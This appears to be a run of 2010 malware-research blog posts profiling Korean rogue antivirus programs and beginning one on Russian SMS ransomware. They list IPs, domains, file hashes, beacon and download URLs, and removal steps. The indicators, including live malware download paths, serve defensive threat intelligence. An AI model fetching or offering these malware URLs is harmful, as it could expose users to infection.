To read the full report<a href="http://malwareint.blogspot.com/2010/08/fakeav-via-new-strategy-of-deception.html"> <span style="color: orange;">MalwareIntelligence blog</span></a>.<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-v.html" style="color: orange;">Litter Korean rogue lurking V</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-70097778656817114932010-08-29T03:01:00.000+01:002010-08-29T03:01:28.306+01:00Litter Korean rogue lurking V<div style="text-align: justify;">Another piece of rogue from Korea and belonging to the family of <b>PrivacyKeep</b>, <b>PrivacyCorp</b> and <b>PCScan</b>.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-GsdlCxI/AAAAAAAAAVc/okzYmEgJjK8/s1600/MI_pi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><b><br />
ProtectInfo</b><br />
protectinfo.co.kr - <b>114.108.168.8</b> - DACOM-NET LG DACOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-GsdlCxI/AAAAAAAAAVc/okzYmEgJjK8/s1600/MI_pi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-GsdlCxI/AAAAAAAAAVc/okzYmEgJjK8/s400/MI_pi.png" width="400" /></a></div><br />
The IP address also resolves the following domains:<br />
ad-clear.com<br />
privacycop.co.kr<br />
privacykeep.co.kr<br />
protectinfo.co.kr<br />
<br />
<b>protectinfo_home.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=52c8cbdaf314adaeeb58f3f4184884203e7cf9cb52545367cf7205c2661dfe4a-1282259983" style="color: orange;">a48e62c64f68a2b32dc601efffa2973d</a>)<br />
<br />
update.protectinfo.co.kr/instchk.php<br />
<br />
<i><span style="font-size: x-small;">226<br />
[COUNTER]<br />
NUM=6<br />
<br />
[CHECK1]<br />
HKEY=HKLM<br />
REGPATH=............<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[CHECK2]<br />
HKEY=HKLM<br />
REGPATH=PrivacyCheck<br />
REGNAME=DisplayName<br />
REGVALUE=.......... ....<br />
<br />
[CHECK3]<br />
HKEY=HKLM<br />
REGPATH=............<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[CHECK4]<br />
HKEY=HKLM<br />
REGPATH=............<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[CHECK5]<br />
HKEY=HKLM<br />
REGPATH=..........<br />
REGNAME=DisplayName<br />
REGVALUE=..........<br />
<br />
[CHECK6] <br />
HKEY=HKLM<br />
REGPATH=privacykeep<br />
REGNAME=DisplayName<br />
REGVALUE=............<br />
<br />
[HISTORYREG]<br />
PATH="............" </span></i><br />
<br />
protectinfo.co.kr/app_linkage/app_install.php?addr=000C29CA888C&ptn=infocode0067<br />
protectinfo.co.kr/app_linkage/app_setting.php?mac=00-0C-29-CA-88-8C <br />
<br />
<i><span style="font-size: x-small;">3d <br />
payed=0<br />
pw_usr=<br />
pw_sup=1470<br />
hp1=<br />
hp2=<br />
hp3=<br />
small=300<br />
big=300</span></i><br />
<br />
log.adsence.co.kr/logexp.php?aid=protectinfo&pid=infocode0067&kind=inst <br />
file.protectinfo.co.kr/update.php<br />
<br />
<i><span style="font-size: x-small;">protectinfo.exe=0.325<br />
pnfoupdater.exe=0.113<br />
pnfohk.dll=0.110<br />
pnfouninst.exe=0.1<br />
pnfowcher.exe=0.116<br />
pnfopopd.dll=0.1</span></i><br />
<br />
protectinfo.co.kr/app_linkage/app_boot.php?ver=.0.398<br />
protectinfo.co.kr/popup_settle.html?addr=00-0C-29-CA-88-8C<br />
protectinfo.co.kr/settlement/paysys/mobile/Deliver.php<br />
protectinfo.co.kr/settlement/paysys/pbill/Deliver.php<br />
protectinfo.co.kr/settlement/paysys/ars/Deliver.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-5DgXRLI/AAAAAAAAAVk/C2NmKAPcMSA/s1600/MI_protectinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THm-5DgXRLI/AAAAAAAAAVk/C2NmKAPcMSA/s400/MI_protectinfo.png" width="400" /></a></div><br />
<br />
<span style="font-size: large;"><span><span><b>Countermeasures</b></span></span></span><br />
<br />
Uninstall from Program Files<br />
Running updated antivirus<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><br />
<br />
<span style="color: orange;"></span><span style="color: orange;"></span> <a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-iv.html" style="color: orange;">Litter Korean rogue lurking IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking III</a><br />
<span style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking II</a> </span><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html"><span style="color: orange;">Litter Korean rogue lurking I</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><br />
<br />
Jorge Mieres <div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-55500301921773594312010-08-22T16:38:00.000+01:002010-08-22T16:38:00.093+01:00Litter Korean rogue lurking IV<div style="text-align: justify;">Korean rogue fourth part of the "litter" that haunts the past few days looking for potential victims caught in Korea. At times the rogue that spread can have an option to change the language, so that coverage is much wider infection, however, in this case, it's directed at specific populations rogue.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THCcMAk5IxI/AAAAAAAAAVE/i-aimwncf30/s1600/MI_pc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<b>PrivacyCorp</b><br />
privacycop.co.kr - <b>114.108.168.8</b> - DACOM-NET LG DACOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THCcMAk5IxI/AAAAAAAAAVE/i-aimwncf30/s1600/MI_pc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THCcMAk5IxI/AAAAAAAAAVE/i-aimwncf30/s400/MI_pc.png" width="400" /></a></div><br />
The IP is also the following domains:<br />
ad-clear.com<br />
info-dr.com<br />
<br />
<b>privacycop_setup.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=b207105421b1a94021572970ec69d4e7649a5de53f5aed856f53de8148a25deb-1282088693" style="color: orange;">8362c089bc4f7932dc885e23044cb2f6</a>)<br />
<b>privacy_mediccop.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=b6f02a469db1d6938bbc31a8cbfa83d5cef802d7f7accfdb7ce48912c6c136b5-1281974806" style="color: orange;">46f2a84d7217a5ca56208ea0b13c6f52</a>)<br />
<br />
<div style="text-align: justify;">The circuit is part rogue criminal systems led by members who pay a percentage of money for each installation of the threat spread. This case is no exception. The rogue reports successful installation immediately after infection.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THCcwcJj0XI/AAAAAAAAAVM/8ZaG5gxLa2I/s1600/MI_pc-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
privacycop.co.kr/app_linkage/app_install.php?addr=000C29CA888C&ptn=home<br />
log.adsence.co.kr/logexp.php?aid=privacycop&pid=home&kind=inst<br />
privacycop.co.kr/app_linkage/app_setting.php?mac=00-0C-29-CA-88-8C <br />
3e <br />
payed=0<br />
pw_usr=<br />
pw_sup=1470<br />
hp1=<br />
hp2=<br />
hp3=<br />
small=300<br />
big=3660<br />
<br />
file.privacycop.co.kr/update.php <br />
6d <br />
privacycop.exe=0.328<br />
pvcupdater.exe=0.112<br />
pvchk.dll=0.1<br />
pvcuninst.exe=0.1<br />
pvcwcher.exe=0.112<br />
pvcpopd.dll=0.1<br />
<br />
privacycop.co.kr/app_linkage/app_boot.php?ver=.0.4.5.3 <br />
privacycop.co.kr/popup_settle.html?addr=00-0C-29-CA-88-8C<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THCcwcJj0XI/AAAAAAAAAVM/8ZaG5gxLa2I/s1600/MI_pc-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THCcwcJj0XI/AAAAAAAAAVM/8ZaG5gxLa2I/s400/MI_pc-scan.png" width="400" /></a></div><br />
<span style="font-size: large;"><span><b>Countermeasures</b></span></span><br />
Terminate the processes called <b>privacycop.exe</b> and <b>pvcwcher.exe</b>. You can use the <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">ProcessExplorer</a> to view and terminate processes.<br />
<br />
Uninstall from Program Files<br />
Running updated antivirus<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><span style="color: orange;"></span><span style="color: orange;"></span><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking III</a><br />
<span style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking II</a> </span><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html"><span style="color: orange;">Litter Korean rogue lurking I</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-47679144832651237222010-08-22T14:16:00.000+01:002010-08-22T14:16:00.886+01:00Litter Korean rogue lurking III<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THBCQ-UXTlI/AAAAAAAAAU0/biYotlVKvlQ/s1600/MI_PCscaner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THBCbgWhN2I/AAAAAAAAAU8/Y-p8hvfQopg/s1600/MI_PCScan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;"><b>PCScan</b> is another rogue Koreans that have appeared in recent days, in addition to the two previously showed.</div><br />
pcscan.kr - <b>114.108.129.233</b> - DACOM-NET LG DACOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THBCbgWhN2I/AAAAAAAAAU8/Y-p8hvfQopg/s1600/MI_PCScan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THBCbgWhN2I/AAAAAAAAAU8/Y-p8hvfQopg/s400/MI_PCScan.png" width="400" /></a></div>The IP also resolves the following domains:<br />
eroza.net<br />
master.to84.net<br />
to84.net<br />
www.tvbaro.net<br />
<br />
Setup.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=b0c9c02ae7f6800ab8aa2a83f25ac2c6ce301c16eb6f69036d83bd29a9a3625f-1282037567" style="color: orange;">a85900759318ea66dc94ba789aae2cfe</a>)<br />
PCScan.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=8e6bee10c71e38d2659509cbe7ab0ae8605f0e4d86c47e2362cf097b371a3618-1280882953" style="color: orange;">665b846b82d959843744d9d3a7b39bdc</a>)<br />
PCScanMon.exe (<span style="color: orange;">01cdb8f8955a4df6eebb1aca04d6a43c</span>)<br />
Uninstall.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=4ba6e7ddec920ae9a408becef3a6a03b8fe94ce227654058208a49a0692570dd-1282074848" style="color: orange;">76cd1340bded9d96050df30999f6274d</a>)<br />
<br />
<div style="text-align: justify;"><b>Unistaller.exe</b> file simulates the uninstaller antivirus program assumes, however, no effect arises because it’s false.</div><br />
Check the following pages:<br />
pcscan.kr/request/module_setup.php?p=PCScan&a=type1 <br />
pcscan.kr/request/License.txt<br />
pcscan.kr/down/install.exe<br />
down.elineguide.com/down/install.exe<br />
<br />
pcscan.kr/down/files.php?strMode=setup&strID=PCScan&arg=type1&strSite=&strPC=000c29ca888c <br />
pcscan.kr/down/PCScan.exe<br />
pcscan.kr/down/PCScanMon.exe<br />
pcscan.kr/down/Uninstall.exe<br />
pcscan.kr/down/PCScanControl.dll<br />
<br />
pcscan.kr/value.php?strMode=setup&strID=PCScan&arg=type1&strSite=&strPC=000c29ca888c&url=<br />
pcscan.kr/settle.php?strID=PCScan&arg=type1&strPC=000c29ca888c&strSite=pcscan.kr<br />
pcscan.kr/bill_danal/bill_home/with_bill.php?strID=PCScan&arg=type1&strPC=000c29ca888c&strSite=pcscan.kr<br />
pcscan.kr/consultation.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THBCQ-UXTlI/AAAAAAAAAU0/biYotlVKvlQ/s1600/MI_PCscaner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THBCQ-UXTlI/AAAAAAAAAU0/biYotlVKvlQ/s400/MI_PCscaner.png" width="400" /></a></div><br />
<span style="font-size: large;"><b>Countermeasure</b></span><br />
<br />
Terminate the processes called PCScan.exe. You can use the <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" style="color: orange;">ProcessExplorer</a> to view and terminate processes.<br />
<br />
Remove PCScan folder (which houses six files) located in C:\Program Files\pcscan\<br />
<br />
Delete the system registry pcscan key from HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run, which refers to "C:\Program Files\pcscan\pcscan.exe". You can use the <a href="http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" style="color: orange;">Autoruns</a> to view and delete the key.<br />
<br />
Delete the desktop shortcut.<br />
<br />
Running updated antivirus<br />
<br />
<b>Related information</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-ii.html" style="color: orange;">Litter Korean rogue lurking II</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html" style="color: orange;">Litter Korean rogue lurking I</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-67999216588710435682010-08-21T20:50:00.000+01:002010-08-21T20:50:21.134+01:00Litter Korean rogue lurking II<div style="color: black;">Se trata de otro rogue perteneciente a la camada que actualmente se encuentra al acecho<b>. </b>Su nombre es <b>PC Boan Plus</b>.<br />
</div>pcboanplus.com - <b>222.122.84.56</b> - KORNET KOREA TELECOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAk9Bw12_I/AAAAAAAAAUc/n9Z_IMwzzbc/s1600/MI_PCboan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAk9Bw12_I/AAAAAAAAAUc/n9Z_IMwzzbc/s400/MI_PCboan.png" width="400" /></a></div>Domains that resolve to the same IP:<br />
postmaster.8282tv.co.kr<br />
pspd.org<br />
<br />
<b>PcBoanPlus2SetupH.exe</b> (0ab2cc07373a4b88a0084f12ae63f54f)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAlRo25DcI/AAAAAAAAAUk/17-bb26KXlE/s1600/MI_PCBoan-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAlRo25DcI/AAAAAAAAAUk/17-bb26KXlE/s400/MI_PCBoan-scan.png" width="400" /></a></div><br />
<div style="text-align: justify;"><br />
</div><div style="text-align: justify;">This rogue report a system of affiliates Pay-per-Install that resolves the domain to an IP address corresponding to the ISP "<b>KRNIC</b>".</div><div style="text-align: justify;"><br />
</div><b>211.33.123.40</b>/pcboanplus/install.php?mac=000C29CA888C&partner=PcBoanPlus&ver= <br />
<br />
file.pcboanPlus.com/app/updater/PcBoanPlus2Up.exe<br />
file.pcboanplus.com/app/Client/PcBoanplus2.exe<br />
pcboanplus.com/app/badinfo.php?Vn=2005010100&Kind=comp<br />
<br />
s223.pc-korea.net/badlist/2010080700_badfile.dat<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAmvT3KD6I/AAAAAAAAAUs/v0DCEAF6SNs/s1600/MI_PC-korea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THAmvT3KD6I/AAAAAAAAAUs/v0DCEAF6SNs/s400/MI_PC-korea.png" width="400" /></a></div><br />
<br />
<span style="font-size: large;"><b>Countermeasure</b></span><br />
<br />
Uninstall from Program Files<br />
Running updated antivirus<br />
<br />
<b></b> <br />
<b>Related information</b><br />
<br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/copyright-violation-copyrighted-content.html"><br />
</a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/litter-korean-rogue-lurking-i.html"><span style="color: orange;">Litter Korean rogue lurking I</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><br />
<a href="http://malwareint.blogspot.com/2010/08/pirated-edition-affiliate-program-pay.html" style="color: orange;">Pirated Edition. Affiliate program Pay-per-Install</a><br />
<a href="http://malwareint.blogspot.com/2010/08/pay-per-install-through-viva-installs.html" style="color: orange;">Pay-per-Install through VIVA INSTALLS / HAPPY INSTALLS in BKCNET “SIA” IZZI </a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-55186306392728051782010-08-21T20:39:00.000+01:002010-08-21T20:39:22.832+01:00Litter Korean rogue lurking I<div style="text-align: justify;">Language issues are not limited to developers of malicious code and the objectives of the criminals are far beyond any border, and although it is usually the largest flow of varieties are in English and, to a lesser extent Russian every now and then the guns are aimed at specific audiences, as in this case: Korean rogue.</div><br />
<div style="color: black;"><b>MegaVaccine</b></div>megavaccine.com - <b>218.146.255.151</b> - KORNET KOREA TELECOM<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAiWprPBpI/AAAAAAAAAUM/0TJhuD7rFlM/s1600/MI_MV-korea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAiWprPBpI/AAAAAAAAAUM/0TJhuD7rFlM/s400/MI_MV-korea.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THAiSxfRf9I/AAAAAAAAAUE/3CC87DVG1vU/s1600/MI_pkwow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>The IP is also the following domains:<br />
goodprivacy.co.kr<br />
megavaccine.com<br />
pc-privacy.co.kr<br />
pc-up.co.kr<br />
pcsweeper.co.kr<br />
pctool.co.kr<br />
privacyboan.com<br />
privacyq.com<br />
rprotect.co.kr<br />
uprivacy.net<br />
wowprotect.co.kr<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THAiSxfRf9I/AAAAAAAAAUE/3CC87DVG1vU/s1600/MI_pkwow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/THAiSxfRf9I/AAAAAAAAAUE/3CC87DVG1vU/s400/MI_pkwow.png" width="400" /></a></div><br />
megavaccine_setup.exe (<a href="http://www.virustotal.com/file-scan/report.html?id=5b4f53218fb3da9fe188193ed46d0fd52b5050adb0d5b2a1933fd92a9adf6fa7-1282310433" style="color: orange;">2234041b04e072aa7585209fa66e8550</a>)<br />
<br />
down.megavaccine.com/autoupdate/MegaVaccine/MVaccine.exe<br />
down.megavaccine.com/Update_db/addb.dat<br />
down.megavaccine.com/Update_db/adsub.dat<br />
down.megavaccine.com/Update_db/adtc.dat<br />
down.megavaccine.com/Update_db/avmon.dat<br />
down.megavaccine.com/Update_db/inter.dll<br />
down.megavaccine.com/Update_db/pwdb.dat<br />
down.megavaccine.com/Update_db/vsdb.dat<br />
down.megavaccine.com/Update_info/2010081900-00-.txt<br />
down.megavaccine.com/Update_ini/MegaVaccine/autoupdate.ini<br />
down.megavaccine.com/app/weboard.html<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THAiYyETHNI/AAAAAAAAAUU/ocpy3RWPa5s/s1600/MI_MV-korea-scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THAiYyETHNI/AAAAAAAAAUU/ocpy3RWPa5s/s400/MI_MV-korea-scan.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/THAiWprPBpI/AAAAAAAAAUM/0TJhuD7rFlM/s1600/MI_MV-korea.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><span style="font-size: large;"><b>Countermeasure</b></span><br />
<br />
Uninstall from Program Files<br />
Running updated antivirus<br />
<br />
<br />
<b>Related information</b><br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/copyright-violation-copyrighted-content.html"><br />
</a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/pc-defender-antivirus-rogue-update.html" style="color: orange;">PC Defender Antivirus rogue update system registry</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/phoenix-exploits-kit-and-pay-per.html" style="color: orange;">Phoenix Exploit's Kit and Pay-per-Install via PC Defender Antivirus</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/dangerous-trojans-keyloggers-and.html" style="color: orange;">Dangerous trojans, keyloggers and Spyware detected in you computer!!!</a><br />
<a href="http://malwaredisasters.blogspot.com/2009/12/desktop-hijack-by-internet-security.html" style="color: orange;">Desktop Hijack by Internet Security 2010. Your System Is Infected!</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-18732817396099667042010-08-16T02:07:00.000+01:002010-08-16T02:07:20.566+01:00New Russian SMS ransomware In-the-Wild<div style="text-align: justify;">The development of malware designed to block access to the operating system is in full expansion. Despite being at present a very different generation of <b>ransomware </b>the first generations where, using cryptovirology, literally kidnapped by encrypting user files and requesting a financial compensation in exchange for the release key, the concept and goal has not changed.<br />
<br />
In this case, it’s a new variant of <b>SMS ransomware</b> blocking access to the operating system screen showing an alleged safety report in which reference is an infection caused by a variant of trojan recruits zombie botnets for <b>ZeuS</b> is actually false.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOCuLtaII/AAAAAAAAATc/4U6uSoYWqwY/s1600/MI_ransom-blocker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="315" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TGiOCuLtaII/AAAAAAAAATc/4U6uSoYWqwY/s400/MI_ransom-blocker.png" width="400" /></a></div><br />
<div style="text-align: justify;">The brief report is in Russian language with which it follows that the objectives of malware are the users of that country. However, the spread of the threat has no boundaries and no language limitations.<br />
<br />
